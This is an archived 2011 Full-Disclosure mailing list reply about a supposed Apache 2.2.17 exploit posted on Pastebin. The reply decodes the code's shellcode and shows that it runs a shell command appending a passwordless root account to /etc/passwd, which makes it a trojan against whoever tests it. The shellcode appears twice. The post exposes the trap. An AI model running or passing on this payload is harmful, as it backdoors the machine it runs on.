lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Message-ID: <93401484ef12296d259f078e833d4b1d@gen-x.co.nz>
Date: Wed, 05 Oct 2011 15:09:54 +1300
From: VeNoMouS <venom@...-x.co.nz>
To: <full-disclosure@...ts.grok.org.uk>
Subject: Re: Apache 2.2.17 exploit?

  
char evil[] =  
 "xebx2ax5ex31xc0x88x46x07x88x46x0ax88x46x47x89" 

"x76x49x8dx5ex08x89x5ex4dx8dx5ex0bx89x5ex51x89" 

"x46x55xb0x0bx89xf3x8dx4ex49x8dx56x55xcdx80xe8" 

"xd1xffxffxffx2fx62x69x6ex2fx73x68x23x2dx63x23" 

"x2fx62x69x6ex2fx65x63x68x6fx20x77x30x30x30x74" 

"x3ax3ax30x3ax30x3ax73x34x66x65x6dx30x64x65x3a" 

"x2fx72x6fx6fx74x3ax2fx62x69x6ex2fx62x61x73x68" 

"x20x3ex3ex20x2fx65x74x63x2fx70x61x73x73x77x64" 

"x23x41x41x41x41x42x42x42x42x43x43x43x43x44x44" 
 "x44x44"   
.....

execl("/bin/sh", "sh", "-c", evil, 0);  

..... 

/bin/echo
w000t::0:0:s4fem0de:/root:/bin/bash >> /etc/passwd

AHUH..... 

On Mon,
3 Oct 2011 15:31:29 +0100, Darren Martyn wrote: 

> I regularly trawl
Pastebin.com to find code - often idiots leave some 0day and similar
there and it is nice to find. 
> 
> Well, seeing as I have no test boxes
at the moment, can someone check this code in a VM? I am not sure if it
is legit or not.
> 
> http://pastebin.com/ygByEV2e [1]
> 
> Thanks :)
>

> ~Darren

 	* 
char evil[] =  
 	* 

"xebx2ax5ex31xc0x88x46x07x88x46x0ax88x46x47x89" 
 	* 

"x76x49x8dx5ex08x89x5ex4dx8dx5ex0bx89x5ex51x89" 
 	* 

"x46x55xb0x0bx89xf3x8dx4ex49x8dx56x55xcdx80xe8" 
 	* 

"xd1xffxffxffx2fx62x69x6ex2fx73x68x23x2dx63x23" 
 	* 

"x2fx62x69x6ex2fx65x63x68x6fx20x77x30x30x30x74" 
 	* 

"x3ax3ax30x3ax30x3ax73x34x66x65x6dx30x64x65x3a" 
 	* 

"x2fx72x6fx6fx74x3ax2fx62x69x6ex2fx62x61x73x68" 
 	* 

"x20x3ex3ex20x2fx65x74x63x2fx70x61x73x73x77x64" 
 	* 

"x23x41x41x41x41x42x42x42x42x43x43x43x43x44x44" 
 	* 
 "x44x44"; 




Links:
------
[1] http://pastebin.com/ygByEV2e

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ